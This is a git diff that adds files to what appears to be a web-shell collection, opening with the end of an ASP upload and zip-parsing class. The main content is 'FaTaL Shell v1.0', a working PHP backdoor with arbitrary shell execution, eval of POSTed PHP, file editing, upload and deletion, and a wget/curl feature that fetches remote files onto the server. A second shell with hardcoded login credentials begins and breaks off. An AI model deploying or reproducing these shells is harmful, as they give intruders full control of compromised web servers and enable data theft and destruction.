+Dim llngLength
+llngStart = InStr(1, pstrDisposition, "filename=""", vbTextCompare)
+If llngStart = 0 Then Exit Function
+llngEnd = InStr(llngStart + 10, pstrDisposition, """")
+If llngEnd = 0 Then Exit Function
+llngStart = llngStart + 10
+If llngStart >= llngEnd Then Exit Function
+llngLength = llngEnd - llngStart
+ParseFileName = Mid(pstrDisposition, llngStart, llngLength)
+End Function
+
+Public Property Get Count()
+Count = mlngCount
+End Property
+
+Public Default Property Get Fields(ByVal pstrName)
+Dim llngIndex
+If IsNumeric(pstrName) Then
+llngIndex = CLng(pstrName)
+If llngIndex > mlngCount - 1 Or llngIndex < 0 Then
+Call Err.Raise(vbObjectError + 1, "clsUpload.asp", "Object does not exist within the ordinal reference.")
+Exit Property
+End If
+Set Fields = mobjFieldAry(pstrName)
+Else
+pstrName = LCase(pstrname)
+For llngIndex = 0 To mlngCount - 1
+If LCase(mobjFieldAry(llngIndex).Name) = pstrName Then
+Set Fields = mobjFieldAry(llngIndex)
+Exit Property
+End If
+Next
+End If
+Set Fields = New clsField
+End Property
+
+Private Sub Class_Terminate()
+Dim llngIndex
+For llngIndex = 0 To mlngCount - 1
+Set mobjFieldAry(llngIndex) = Nothing
+
+Next
+ReDim mobjFieldAry(-1)
+End Sub
+
+Private Sub Class_Initialize()
+ReDim mobjFieldAry(-1)
+CR = ChrB(Asc(vbCr))
+LF = ChrB(Asc(vbLf))
+CRLF = CR & LF
+mlngCount = 0
+Call RequestData
+Call ParseDelimiter()
+Call ParseData
+End Sub
+
+Private Function CStrU(ByRef pstrANSI)
+Dim llngLength
+Dim llngIndex
+llngLength = LenB(pstrANSI)
+For llngIndex = 1 To llngLength
+CStrU = CStrU & Chr(AscB(MidB(pstrANSI, llngIndex, 1)))
+Next
+End Function
+
+Private Function CStrB(ByRef pstrUnicode)
+Dim llngLength
+Dim llngIndex
+llngLength = Len(pstrUnicode)
+For llngIndex = 1 To llngLength
+CStrB = CStrB & ChrB(Asc(Mid(pstrUnicode, llngIndex, 1)))
+Next
+End Function
+End Class
+
+'###########################################################################################
+
+Class clsZip
+Private mbin_Zip
+Private mobj_Files()
+Private mlng_Files
+
+Sub ZipLoad(pstrFileName)
+Dim lobjFSO
+Dim llngTristateFalse
+Dim llngForReading
+dim objStream
+
+mbin_Zip = ""
+
+If pstrFileName = "" Then Exit Sub
+
+If InStr(1, pstrFileName, ":\") = 0 Then
+pstrFileName = Server.MapPath(pstrFileName)
+End If
+
+Set lobjFSO = Server.CreateObject("Scripting.FileSystemObject")
+
+If lobjFSO.FileExists(pstrFileName) Then
+set objStream=Server.CreateObject("ADODB.Stream")
+objStream.Type=1
+objStream.Open
+on error resume next
+objStream.LoadFromFile(pstrFileName)
+mbin_Zip = objStream.Read
+set objStream=nothing
+End If
+
+Set lobjFSO = Nothing
+
+Call ParseZips()
+
+End Sub
+
+Public Property Let ZipData(ByRef pbinBinaryData)
+mbin_Zip = pbinBinaryData
+Call ParseZips()
+End Property
+Public Property Get FileCount()
+FileCount = mlng_Files
+End Property
+Public Property Get GetFile(ByRef plngIndex)
+Set GetFile = mobj_Files(plngIndex-1)
+End Property
+
+Private Sub ParseZips()
+Dim llngOffSet
+mlng_Files = 0
+llngOffSet = 0
+If LenB(mbin_Zip) = 0 Then Exit Sub
+Do
+' Find next PK 3.04 record
+llngOffset = InStrB(llngOffset + 1, mbin_zip, ChrB(&h50) & ChrB(&h4B) & ChrB(&h03) & ChrB(&h04))
+If llngOffset = 0 Then Exit Do
+llngOffset = llngOffset - 1
+ReDim Preserve mobj_Files(mlng_Files)
+Set mobj_Files(mlng_Files) = New clsZipFile
+With mobj_Files(mlng_Files)
+.Signature = GetString(llngOffset + 1, 2) & " " & CInt(GetHex(llngOffset + 3, 1)) & "." & GetHex(llngOffset + 4, 1)
+.ExtractVersion = FormatNumber(GetNumber(llngOffset + 5, 2) * .1, 1, True)
+.GeneralPurposeFlags = GetNumber(llngOffset + 7, 2)
+.CompressionMethod = GetNumber(llngOffset + 9, 2)
+.LastModifiedTime = GetNumber(llngOffset + 11, 2)
+.LastModifiedDate = GetNumber(llngOffset + 13, 2)
+.CRC32 = GetNumber(llngOffset + 15, 4)
+.CompressedSize = GetNumber(llngOffset + 19, 4)
+.UncompressedSize = GetNumber(llngOffset + 23, 4)
+.FileNameLength = GetNumber(llngOffset + 27, 2)
+.ExtraFieldLength = GetNumber(llngOffset + 29, 2)
+.FileName = GetString(llngOffset + 31, .FileNameLength)
+.ExtraField = GetString(llngOffset + 31 + .FileNameLength, .ExtraFieldLength)
+.StartByte = llngOffSet + 1
+.EndByte = llngOffSET + .FileNameLength + .ExtraFieldLength + .CompressedSize + 30
+' .BinaryData = MidB(pbin_Zip, llngOffSET + .FileNameLength + .ExtraFieldLength + 30, .CompressedSize)
+' .LocalFileHeader = GetString(llngOffset + 1, .FileNameLength + .ExtraFieldLength + 30)
+llngOffSet = .EndByte
+.IsOverall = (.Name = "" And .Path = "")
+.IsFolder = (.Name = "" And Not .Path = "")
+End With
+mlng_Files = mlng_Files + 1
+Loop While mobj_Files(mlng_Files - 1).EndByte < LenB(mbin_zip)
+End Sub
+
+Private Function GetHex(plngStart, plngLength)
+Dim llngIndex
+Dim lstrHex
+For llngIndex = 0 To plngLength - 1
+lstrHex = lstrHex & Right("0" & Hex(AscB(MidB(mbin_zip, plngStart + llngIndex, 1))), 2)
+Next
+GetHex = lstrHex
+End Function
+
+Private Function GetString(plngStart, plngLength)
+Dim llngIndex
+Dim lstrString
+If LenB(mbin_zip) < (plngStart + (plngLength - 1)) Then Exit Function
+For llngIndex = 0 To plngLength - 1
+If AscB(MidB(mbin_zip, plngStart + llngIndex, 1)) = 0 Then
+lstrString = lstrString & " "
+Else
+lstrString = lstrString & Chr(AscB(MidB(mbin_zip, plngStart + llngIndex, 1)))
+End If
+Next
+GetString = lstrString
+End Function
+
+Private Function GetNumber(plngStart, plngLength)
+If plngStart < 0 Then Exit Function
+Dim llngIndex
+Dim lstrHex
+For llngIndex = 0 To plngLength - 1
+lstrHex = Right("0" & Hex(AscB(MidB(mbin_zip, plngStart + llngIndex, 1))), 2) & lstrHex
+Next
+GetNumber = CDbl("&h" & lstrHex)
+End Function
+
+Function GetDate(plngStart)
+Dim llngDate
+llngDate = GetNumber(plngStart, 2)
+GetDate = DateSerial(1980 + (llngDate And &HFE00) \ &H200, (llngDate And &H1E0) \ &H20, llngDate And &H1F)
+End Function
+
+Function GetTime(plngStart)
+Dim llngDate
+llngDate = GetNumber(plngStart, 2)
+GetTime = TimeSerial((llngDate And &HF800) \ &H800, (llngDate And &H7E0) \ &H20, (llngDate And &H1F) * 2)
+End Function
+End Class
+
+Class clsZipFile
+Public Signature
+Public ExtractVersion
+Public GeneralPurposeFlags
+Public CompressionMethod
+Public LastModifiedTime
+Public LastModifiedDate
+Public CRC32
+Public CompressedSize
+Public UncompressedSize
+Public FileNameLength
+Public ExtraFieldLength
+Public FileName
+Public ExtraField
+Public StartByte
+Public EndByte
+Public BinaryData
+Public LocalFileHeader
+
+Public IsFolder
+Public IsOverall
+
+Public Property Get Name
+Dim lstrPath
+lstrPath = Replace(FileName, "/", "\")
+If InStr(1, lstrPath, "\") = "0" Then
+Name = lstrPath
+Exit Property
+End If
+Name = Mid(lstrPath, InStrRev(lstrPath, "\") + 1)
+End Property
+
+Public Property Get Path
+Dim lstrPath
+lstrPath = Replace(FileName, "/", "\")
+If InStr(1, lstrPath, "\") = "0" Then
+Path = ""
+Exit Property
+End If
+Path = Mid(lstrPath, 1, InStrRev(lstrPath, "\"))
+End Property
+
+Public Property Get Packed
+Packed = CompressedSize
+End Property
+
+Public Property Get Ratio
+If UncompressedSize = 0 Then Exit Property
+If CompressedSize >= UncompressedSize Then
+Ratio = "0%"
+Else
+Ratio = FormatNumber(((1 - (CompressedSize / UncompressedSize)) * 100), 0, True, False, True) & "%"
+End If
+End Property
+
+Public Property Get Modified()
+Modified = CDate(GetDate(LastModifiedDate) & " " & GetTime(LastModifiedTime))
+End Property
+
+Private Function GetDate(plngDate)
+GetDate = DateSerial(1980 + (plngDate And &HFE00) \ &H200, _
+(plngDate And &H1E0) \ &H20, plngDate And &H1F)
+End Function
+
+Private Function GetTime(plngDate)
+GetTime = TimeSerial((plngDate And &HF800) \ &H800, _
+(plngDate And &H7E0) \ &H20, _
+(plngDate And &H1F) * 2)
+End Function
+
+Public Property Get Size()
+Size = UncompressedSize
+End Property
+
+Public Property Get BitMask()
+Dim llngNumber
+Dim lstrBits
+llngNumber = GeneralPurposeFlags
+Do
+If llngNumber Mod 2 = 1 Then lstrBits = "1" & lstrBits Else lstrBits = "0" & lstrBits
+llngNumber = llngNumber \ 2
+Loop Until llngNumber = 0
+lstrBits = Right("0000000000000000" & lstrBits, 16)
+For llngNumber = 0 To 3
+lstrReturn = lstrReturn & Mid(lstrBits, (llngNumber * 4) + 1, 4) & "."
+Next
+BitMask = Left(lstrReturn, 19)
+End Property
+
+Property Get CompressionMethodString()
+Select Case CompressionMethod
+Case 0 CompressionMethodString = "The file is stored (no compression)"
+Case 1 CompressionMethodString = "The file is Shrunk"
+Case 2 CompressionMethodString = "The file is Reduced with compression factor 1"
+Case 3 CompressionMethodString = "The file is Reduced with compression factor 2"
+Case 4 CompressionMethodString = "The file is Reduced with compression factor 3"
+Case 5 CompressionMethodString = "The file is Reduced with compression factor 4"
+Case 6 CompressionMethodString = "The file is Imploded"
+Case 7 CompressionMethodString = "Reserved for Tokenizing compression algorithm"
+Case 8 CompressionMethodString = "The file is Deflated"
+Case 9 CompressionMethodString = "Reserved for enhanced Deflating"
+Case 10 CompressionMethodString = "PKWARE Date Compression Library Imploding"
+Case Else CompressionMethodString = "Unhandled Copression type: " & CompressionMethod
+End Select
+End Property
+End Class
+%>
\ No newline at end of file
diff --git a/138shell/F/Fatalshell.php.txt b/138shell/F/Fatalshell.php.txt
new file mode 100644
index 0000000..c43d10d
--- /dev/null
+++ b/138shell/F/Fatalshell.php.txt
@@ -0,0 +1,283 @@
+<?php
+session_start();
+error_reporting(E_ALL ^ E_NOTICE);
+set_magic_quotes_runtime(0);
+@set_time_limit(0);
+if(@get_magic_quotes_gpc()){foreach ($_POST as $k=>$v){$_POST[$k] = stripslashes($v);}}
+@ini_set('max_execution_time',0);
+(@ini_get('safe_mode')=="1" ? $safe_mode="ON" : $safe_mode="OFF(Rootla_Beni:)");
+
+(@ini_get('disable_functions')!="" ? $disfunc=ini_get('disable_functions') : $disfunc=0);
+(strtoupper(substr(PHP_OS, 0, 3))==='WIN' ? $os=1 : $os=0);
+$version='version 1.0 by FaTaLErrOr';
+$action=$_POST['action'];
+$file=$_POST['file'];
+$dir=$_POST['dir'];
+$content='';
+$stdata='';
+$style='<STYLE>BODY{background-color: #2B2F34;color: #C1C1C7;font: 8pt verdana, geneva, lucida, \'lucida grande\', arial, helvetica, sans-serif;MARGIN-TOP: 0px;MARGIN-BOTTOM: 0px;MARGIN-LEFT: 0px;MARGIN-RIGHT: 0px;margin:0;padding:0;scrollbar-face-color: #336600;scrollbar-shadow-color: #333333;scrollbar-highlight-color: #333333;scrollbar-3dlight-color: #333333;scrollbar-darkshadow-color: #333333;scrollbar-track-color: #333333;scrollbar-arrow-color: #333333;}input{background-color: #336600;font-size: 8pt;color: #FFFFFF;font-family: Tahoma;border: 1 solid #666666;}select{background-color: #336600;font-size: 8pt;color: #FFFFFF;font-family: Tahoma;border: 1 solid #666666;}textarea{background-color: #333333;font-size: 8pt;color: #FFFFFF;font-family: Tahoma;border: 1 solid #666666;}a:link{color: #B9B9BD;text-decoration: none;font-size: 8pt;}a:visited{color: #B9B9BD;text-decoration: none;font-size: 8pt;}a:hover, a:active{background-color: #A8A8AD;color: #E7E7EB;text-decoration: none;font-size: 8pt;}td, th, p, li{font: 8pt verdana, geneva, lucida, \'lucida grande\', arial, helvetica, sans-serif;border-color:black;}</style>';
+$header='<html><head><title>'.getenv("HTTP_HOST").' - FaTaL Shell v1.0</title><meta http-equiv="Content-Type" content="text/html; charset=windows-1254">'.$style.'</head><BODY leftMargin=0 topMargin=0 rightMargin=0 marginheight=0 marginwidth=0>';
+$footer='</body></html>';
+
+$lang=array(
+'filext'=>'Lutfen Dosyayi Adlandiriniz Yada Degistiriniz.',
+'uploadok'=>'Başarıyla Yüklendi.',
+'dircrt'=>'Klasör Oluşturuldu.',
+'dontlist'=>'Listelenemiyor İzin Yok.',
+'dircrterr'=>'Oluşturulamıyor İzin Yok.',
+'dirnf'=>'Dizin Bulunamadi.',
+'filenf'=>'.',
+'dontwrdir'=>'Sadece Okunabilir.',
+'empty'=>'Dizin Boş Değil Yada İzin Yok.',
+'deletefileok'=>'Dosya Silindi.',
+'deletedirok'=>'Klasör Silindi.',
+'isdontfile'=>'Lütfen Full Url Yazın. c:/program files/a.php Gibi',
+'cantrfile'=>'Dosya Açılamıyor izin Yok.',
+'onlyracc'=>'Dosya Editlenemiyor Okuma İzni Var Sadece..',
+'workdir'=>'Çalışma Dizini: ',
+'fullacc'=>'Full Yetki.',
+'fullaccdir'=>'Full Yetkiniz Var Dosya Silip Düzenleyebilirsiniz.',
+'thisnodir'=>'Klasör Seçin.',
+'allfuncsh'=>'Fonksiyoınlar Kapalı.'
+);
+
+$act=array('viewer','editor','upload','shell','phpeval','download','delete','deletedir');//here added new actions
+
+function test_file($file){
+if(!file_exists($file))$err="1";
+elseif(!is_file($file)) $err="2";
+elseif(!is_readable($file))$err="3";
+elseif(!is_writable($file))$err="4"; else $err="5";
+return $err;}
+
+function test_dir($dir){
+if(!file_exists($dir))$err="1";
+elseif(!is_dir($dir)) $err="2";
+elseif(!is_readable($dir))$err="3";
+elseif(!is_writable($dir))$err="4"; else $err="5";
+return $err;}
+
+function perms($file){ 
+  $perms = fileperms($file);
+  if (($perms & 0xC000) == 0xC000) {$info = 's';} 
+  elseif (($perms & 0xA000) == 0xA000) {$info = 'l';} 
+  elseif (($perms & 0x8000) == 0x8000) {$info = '-';} 
+  elseif (($perms & 0x6000) == 0x6000) {$info = 'b';} 
+  elseif (($perms & 0x4000) == 0x4000) {$info = 'd';} 
+  elseif (($perms & 0x2000) == 0x2000) {$info = 'c';} 
+  elseif (($perms & 0x1000) == 0x1000) {$info = 'p';} 
+  else {$info = 'u';}
+  $info .= (($perms & 0x0100) ? 'r' : '-');
+  $info .= (($perms & 0x0080) ? 'w' : '-');
+  $info .= (($perms & 0x0040) ?(($perms & 0x0800) ? 's' : 'x' ) :(($perms & 0x0800) ? 'S' : '-'));
+  $info .= (($perms & 0x0020) ? 'r' : '-');
+  $info .= (($perms & 0x0010) ? 'w' : '-');
+  $info .= (($perms & 0x0008) ?(($perms & 0x0400) ? 's' : 'x' ) :(($perms & 0x0400) ? 'S' : '-'));
+  $info .= (($perms & 0x0004) ? 'r' : '-');
+  $info .= (($perms & 0x0002) ? 'w' : '-');
+  $info .= (($perms & 0x0001) ?(($perms & 0x0200) ? 't' : 'x' ) :(($perms & 0x0200) ? 'T' : '-'));
+  return $info;} 
+
+function view_size($size){
+ if($size >= 1073741824) {$size = @round($size / 1073741824 * 100) / 100 . " GB";}
+ elseif($size >= 1048576) {$size = @round($size / 1048576 * 100) / 100 . " MB";}
+ elseif($size >= 1024) {$size = @round($size / 1024 * 100) / 100 . " KB";}
+ else {$size = $size . " B";}
+ return $size;}
+
+if(isset($action)){if(!in_array($action,$act))$action="viewer";else $action=$action;}else $action="viewer";
+
+if(isset($dir)){
+  $ts['test']=test_dir($dir); 
+  switch($ts['test']){
+    case 1:$stdata.=$lang['dirnf'];break;
+    case 2:$stdata.=$lang['thisnodir'];break;
+    case 3:$stdata.=$lang['dontlist'];break;
+    case 4:$stdata.=$lang['dontwrdir'];$dir=chdir($GLOBALS['dir']);break;
+    case 5:$stdata.=$lang['fullaccdir'];$dir=chdir($GLOBALS['dir']);break;}
+}else $dir=@chdir($dir);
+
+$dir=getcwd()."/";
+$dir=str_replace("\\","/",$dir);
+
+if(isset($file)){
+    $ts['test1']=test_file($file);
+  switch ($ts['test1']){
+    case 1:$stdata.=$lang['filenf'];break;
+	case 2:$stdata.=$lang['isdontfile'];break;
+	case 3:$stdata.=$lang['cantrfile'];break;
+	case 4:$stdata.=$lang['onlyracc'];$file=$file;break;
+	case 5:$stdata.=$lang['fullacc'];$file=$file;break;}
+}
+
+function shell($cmd)
+{
+  global $lang;
+ $ret = '';
+ if (!empty($cmd))
+ {
+  if(function_exists('exec')){@exec($cmd,$ret);$ret = join("\n",$ret);}
+  elseif(function_exists('shell_exec')){$ret = @shell_exec($cmd);}
+  elseif(function_exists('system')){@ob_start();@system($cmd);$ret = @ob_get_contents();@ob_end_clean();}
+  elseif(function_exists('passthru')){@ob_start();@passthru($cmd);$ret = @ob_get_contents();@ob_end_clean();}
+  elseif(@is_resource($f = @popen($cmd,"r"))){$ret = "";while(!@feof($f)) { $ret .= @fread($f,1024); }@pclose($f);}
+  else $ret=$lang['allfuncsh'];
+ }
+ return $ret;
+}
+
+function createdir($dir){mkdir($dir);}
+
+//delete file
+if($action=="delete"){ 
+if(unlink($file)) $content.=$lang['deletefileok']."<a href=\"#\" onclick=\"document.reqs.action.value='viewer';document.reqs.dir.value='".$dir."'; document.reqs.submit();\"> AnaSayfaya Dönemk İçin Tıklayınız.</a>";
+}
+//delete dir
+if($action=="deletedir"){ 
+if(!rmdir($file)) $content.=$lang['empty']."<a href=\"#\" onclick=\"document.reqs.action.value='viewer';document.reqs.dir.value='".$dir."'; document.reqs.submit();\"> AnaSayfaya Dönemk İçin Tıklayınız.</a>";
+else $content.=$lang['deletedirok']."<a href=\"#\" onclick=\"document.reqs.action.value='viewer';document.reqs.dir.value='".$dir."'; document.reqs.submit();\"> AnaSayfaya Dönemk İçin Tıklayınız.</a>";
+}
+//shell
+if($action=="shell"){
+$content.="<form method=\"POST\">
+<input type=\"hidden\" name=\"action\" value=\"shell\">
+<textarea name=\"command\" rows=\"5\" cols=\"150\">".@$_POST['command']."</textarea><br>
+<textarea readonly rows=\"15\" cols=\"150\">".convert_cyr_string(htmlspecialchars(shell($_POST['command'])),"d","w")."</textarea><br>
+<input type=\"submit\" value=\"Uygula\"></form>";}
+//editor  
+if($action=="editor"){
+  $stdata.="<form method=POST>
+  <input type=\"hidden\" name=\"action\" value=\"editor\">
+  <input type=\"hidden\" name=\"dir\" value=\"".$dir."\">
+  Dosyanın Adı (Full Url Yazın)<input type=text name=file value=\"".($file=="" ? $file=$dir : $file=$file)."\" size=50><input type=submit value=\"Editle\"></form>";	  
+  function writef($file,$data){
+  $fp = fopen($file,"w+");
+  fwrite($fp,$data);
+  fclose($fp);
+}
+  function readf($file){
+  clearstatcache();
+  $f=fopen($file, "r");
+  $contents = fread($f,filesize($file));
+  fclose($f);
+  return htmlspecialchars($contents);
+}
+if(@$_POST['save'])writef($file,$_POST['data']);
+if(@$_POST['create'])writef($file,"");
+$test=test_file($file);
+if($test==1){
+$content.="<form method=\"POST\">
+<input type=\"hidden\" name=\"action\" value=\"editor\">
+File name:<input type=\"text\" name=\"file\" value=\"".$file."\" size=\"50\"><br>
+<input type=\"submit\" name=\"create\" value=\"Create new file with this name?\">
+<input type=\"reset\" value=\"No\"></form>";
+}
+if($test>2){
+$content.="<form method=\"POST\">
+<input type=\"hidden\" name=\"action\" value=\"editor\">
+<input type=\"hidden\" name=\"file\" value=\"".$file."\">
+<textarea name=\"data\" rows=\"30\" cols=\"180\">".@readf($file)."</textarea><br>
+<input type=\"submit\" name=\"save\" value=\"Kaydet\"><input type=\"reset\" value=\"Reset\"></form>";
+}}
+//viewer
+if($action=="viewer"){
+$content.="<table cellSpacing=0 border=1 style=\"border-color:black;\" cellPadding=0 width=\"100%\">";
+$content.="<tr><td><form method=POST>Klasore Git:<input type=text name=dir value=\"".$dir."\" size=50><input type=submit value=\"Git\"></form></td></tr>";
+  if (is_dir($dir)) {
+    if (@$dh = opendir($dir)) {
+        while (($file = readdir($dh)) !== false) {
+		  if(filetype($dir . $file)=="dir") $dire[]=$file;
+		  if(filetype($dir . $file)=="file")$files[]=$file;
+		}
+		closedir($dh);
+		@sort($dire);
+		@sort($files);
+		if ($GLOBALS['os']==1) {
+		  $content.="<tr><td>HDD Secin:";
+		  for ($j=ord('C'); $j<=ord('Z'); $j++) 
+		   if (@$dh = opendir(chr($j).":/"))
+		   $content.='<a href="#" onclick="document.reqs.action.value=\'viewer\'; document.reqs.dir.value=\''.chr($j).':/\'; document.reqs.submit();"> '.chr($j).'<a/>';
+		   $content.="</td></tr>";
+		 }
+		$content.="<tr><td>Sistem: ".@php_uname()."</td></tr><tr><td></td><td>Biçim</td><td>Boyut</td><td>izin</td><td>Seçenekler</td></tr>";
+		for($i=0;$i<count($dire);$i++) {
+		  $link=$dir.$dire[$i];
+		  $content.='<tr><td><a href="#" onclick="document.reqs.action.value=\'viewer\'; document.reqs.dir.value=\''.$link.'\'; document.reqs.submit();">'.$dire[$i].'<a/></td><td>Klasor</td><td></td><td>'.perms($link).'</td><td><a href="#" onclick="document.reqs.action.value=\'deletedir\'; document.reqs.file.value=\''.$link.'\'; document.reqs.submit();" title="Klasörü Sil">X</a></td></tr>';  
+		}
+		for($i=0;$i<count($files);$i++) {
+		  $linkfile=$dir.$files[$i];
+		  $content.='<tr><td><a href="#" onclick="document.reqs.action.value=\'editor\';document.reqs.dir.value=\''.$dir.'\'; document.reqs.file.value=\''.$linkfile.'\'; document.reqs.submit();">'.$files[$i].'</a><br></td><td>Dosya</td><td>'.view_size(filesize($linkfile)).'</td><td>'.perms($linkfile).'</td><td><a href="#" onclick="document.reqs.action.value=\'download\'; document.reqs.file.value=\''.$linkfile.'\';document.reqs.dir.value=\''.$dir.'\'; document.reqs.submit();" title="Download">D</a><a href="#" onclick="document.reqs.action.value=\'editor\'; document.reqs.file.value=\''.$linkfile.'\';document.reqs.dir.value=\''.$dir.'\'; document.reqs.submit();" title="Edit">E</a><a href="#" onclick="document.reqs.action.value=\'delete\'; document.reqs.file.value=\''.$linkfile.'\';document.reqs.dir.value=\''.$dir.'\'; document.reqs.submit();" title="Bu Dosyayi Sil">X</a></td></tr>'; 
+		}
+		$content.="</table>";
+}}}
+//downloader
+if($action=="download"){ 
+header('Content-Length:'.filesize($file).'');
+header('Content-Type: application/octet-stream');
+header('Content-Disposition: attachment; filename="'.$file.'"');
+readfile($file);}
+//phpeval
+if($action=="phpeval"){
+$content.="<form method=\"POST\">
+ <input type=\"hidden\" name=\"action\" value=\"phpeval\">
+ <input type=\"hidden\" name=\"dir\" value=\"".$dir."\">
+ &lt;?php<br>
+ <textarea name=\"phpev\" rows=\"5\" cols=\"150\">".@$_POST['phpev']."</textarea><br>
+ ?><br>
+ <input type=\"submit\" value=\"Uygula\"></form>";
+if(isset($_POST['phpev']))$content.=eval($_POST['phpev']);}
+//upload
+if($action=="upload"){
+  if(isset($_POST['dirupload'])) $dirupload=$_POST['dirupload'];else $dirupload=$dir;
+  $form_win="<tr><td><form method=POST enctype=multipart/form-data>
+  <input type=\"hidden\" name=\"action\" value=\"upload\">  
+  Buraya Uploadla:<input type=text name=dirupload value=\"".$dirupload."\" size=50></tr></td><tr><td>Dosyayı Adlandır (Gerekli) :<input type=text name=filename></td></tr><tr><td><input type=file name=file><input type=submit name=uploadloc value='Upload Et'></td></tr>";
+  if($os==1)$content.=$form_win;
+  if($os==0){
+    $content.=$form_win;
+	$content.='<tr><td><select size=\"1\" name=\"with\"><option value=\"wget\">wget</option><option value=\"fetch\">fetch</option><option value=\"lynx\">lynx</option><option value=\"links\">links</option><option value=\"curl\">curl</option><option value=\"GET\">GET</option></select>File addres:<input type=text name=urldown>
+<input type=submit name=upload value=Upload></form></td></tr>';	
+}
+
+if(isset($_POST['uploadloc'])){
+if(!isset($_POST['filename'])) $uploadfile = $dirupload.basename($_FILES['file']['name']); else 
+$uploadfile = $dirupload."/".$_POST['filename'];
+
+if(test_dir($dirupload)==1 && test_dir($dir)!=3 && test_dir($dir)!=4){createdir($dirupload);}
+if(file_exists($uploadfile))$content.=$lang['filext']; 
+elseif (move_uploaded_file($_FILES['file']['tmp_name'], $uploadfile)) 
+$content.=$lang['uploadok'];
+}
+
+if(isset($_POST['upload'])){
+    if (!empty($_POST['with']) && !empty($_POST['urldown']) && !empty($_POST['filename']))
+	switch($_POST['with'])
+	{
+	  case wget:shell(which('wget')." ".$_POST['urldown']." -O ".$_POST['filename']."");break;
+ 	  case fetch:shell(which('fetch')." -o ".$_POST['filename']." -p ".$_POST['urldown']."");break;
+ 	  case lynx:shell(which('lynx')." -source ".$_POST['urldown']." > ".$_POST['filename']."");break;
+ 	  case links:shell(which('links')." -source ".$_POST['urldown']." > ".$_POST['filename']."");break;
+ 	  case GET:shell(which('GET')." ".$_POST['urldown']." > ".$_POST['filename']."");break;
+ 	  case curl:shell(which('curl')." ".$_POST['urldown']." -o ".$_POST['filename']."");break;
+}}}
+//end function
+?><?=$header;?>
+<style type="text/css">
+<!--
+.style4 {
+	font-size: x-large;
+	font-weight: bold;
+}
+.style5 {color: #FF0000}
+.style8 {color: #CCFF00}
+-->
+</style>
+
+<a href="#" onclick="document.reqs.action.value='viewer';document.reqs.dir.value='<?=$dir;?>'; document.reqs.submit();"><p align="center" class="style4">FaTaLSheLL v1.0 </p></a>
+<table width="100%" bgcolor="#336600" align="right" border="0" cellspacing="0" cellpadding="0"><tr><td><table><tr><td><a href="#" onclick="document.reqs.action.value='shell';document.reqs.dir.value='<?=$dir;?>'; document.reqs.submit();">| Shell </a></td><td><a href="#" onclick="document.reqs.action.value='viewer';document.reqs.dir.value='<?=$dir;?>'; document.reqs.submit();">| Ana Sayfa</a></td><td><a href="#" onclick="document.reqs.action.value='editor';document.reqs.file.value='<?=$file;?>';document.reqs.dir.value='<?=$dir;?>'; document.reqs.submit();">| Dosya Editle</a></td><td><a href="#" onclick="document.reqs.action.value='upload';document.reqs.dir.value='<?=$dir;?>'; document.reqs.submit();">| Dosya Upload</a></td><td><a href="#" onclick="document.reqs.action.value='phpeval';document.reqs.dir.value='<?=$dir;?>'; document.reqs.submit();">| Php Eval |</a></td><td><a href="#" onclick="history.back();"> <-Geri |</a></td><td><a href="#" onclick="history.forward();"> İleri->|</a></td></tr></table></td></tr></table><br><form name='reqs' method='POST'><input name='action' type='hidden' value=''><input name='dir' type='hidden' value=''><input name='file' type='hidden' value=''></form>
+<p>&nbsp;</p>
+<table style="BORDER-COLLAPSE: collapse" cellSpacing=0 borderColorDark=#666666 cellPadding=5 width="100%" bgColor=#333333 borderColorLight=#c0c0c0 border=1> <tr><td><span class="style8">Safe mode:</span> <?php echo $safe_mode;?><br>
+      <span class="style8">Fonksiyon Kısıtlaması:</span> <?php echo $disfunc;?><br>
+      <span class="style8">Sistem:</span> <?php echo @php_uname();?><br>
+      <span class="style8">Durum:</span> <?php echo @$stdata;?></td>
+</tr></table><table style="BORDER-COLLAPSE: collapse" cellSpacing=0 borderColorDark=#666666 cellPadding=5 width="100%" bgColor=#333333 borderColorLight=#c0c0c0 border=1><tr><td width="100%" valign="top"><?=$content;?></td></tr></table><table width="100%" bgcolor="#336600" align="right" colspan="2" border="0" cellspacing="0" cellpadding="0"><tr><td><table><tr><td><a href="http://www.starhack.org">COPYRIGHT BY StarHack.oRg <?=$version;?></a></td></tr></table></tr></td></table><?=$footer;?>
\ No newline at end of file
diff --git a/138shell/F/fuckphpshell.txt b/138shell/F/fuckphpshell.txt
new file mode 100644
index 0000000..9e14e5d
--- /dev/null
+++ b/138shell/F/fuckphpshell.txt
@@ -0,0 +1,322 @@
+<?php 
+
+
+error_reporting(0); 
+session_start(); 
+
+unset($user);    // Just in case ;-] 
+unset($pass); 
+
+if ($_POST['cmd']) $_POST['cmd'] = my_encode($_POST['cmd']); 
+
+$cache_lines = 1000; 
+$history_lines = 100;    
+$history_chars = 20;                            
+
+$user[] = "root";        $pass[] = md5("fuckyou");    
+$user[] = "user";      $pass[] = md5("fuckhacker"); 
+
+$alias = array( 
+    "la"    => "ls -la", 
+    "rf"    => "rm -f", 
+    "unbz2" => "tar -xjpf", 
+    "ungz"  => "tar -xzpf" 
+); 
+
+
+
+if (!$_SESSION['user']) { 
+
+    $pr_login = "Login:\n"; 
+    $pr_pass = "Password:\n"; 
+    $err = "Invalid login!\n\n"; 
+    $succ = "Warning! 
+Don`t be stupid .. this is a priv3 server, so take extra care!!!\n\n"; 
+
+    if ($_SESSION['login'] && $_POST['cmd']) { // WE HAVE USERNAME & PASSWORD 
+
+        $_SESSION['output'] .= $pr_pass; 
+
+        if (in_array($_SESSION['login'], $user)) { //........ USERNAME EXISTS 
+
+            $key = array_search($_SESSION['login'], $user); 
+
+            if ($pass[$key] != md5($_POST['cmd'])) { //....... WRONG PASSWORD 
+                $_SESSION['output'] .= $err; 
+                unset($_SESSION['login']); 
+                $prompt = $pr_login; 
+
+            } else { //..................................... SUCCESSFUL LOGIN 
+                $_SESSION['user'] = $_SESSION['login']; 
+                $_SESSION['whoami'] = substr(shell_exec("whoami"), 0, -1); 
+                $_SESSION['host'] = substr(shell_exec("uname -n"), 0, -1); 
+                $_SESSION['dir'] = substr(shell_exec("pwd"), 0, -1); 
+                $_SESSION['output'] .= $succ; 
+                $prompt = set_prompt(); 
+                unset($_SESSION['login']); 
+            } 
+
+        } else { //......................................... NO SUCH USERNAME 
+            $_SESSION['output'] .= $err; 
+            unset($_SESSION['login']); 
+            $prompt = $pr_login; 
+        } 
+
+    } else { //................................................ LOGIN PROCESS 
+
+        if (!$_SESSION['login'] && !$_POST['cmd']) $prompt = $pr_login; 
+
+        if (!$_SESSION['login'] && $_POST['cmd']) { 
+            $_SESSION['login'] = $_POST['cmd']; 
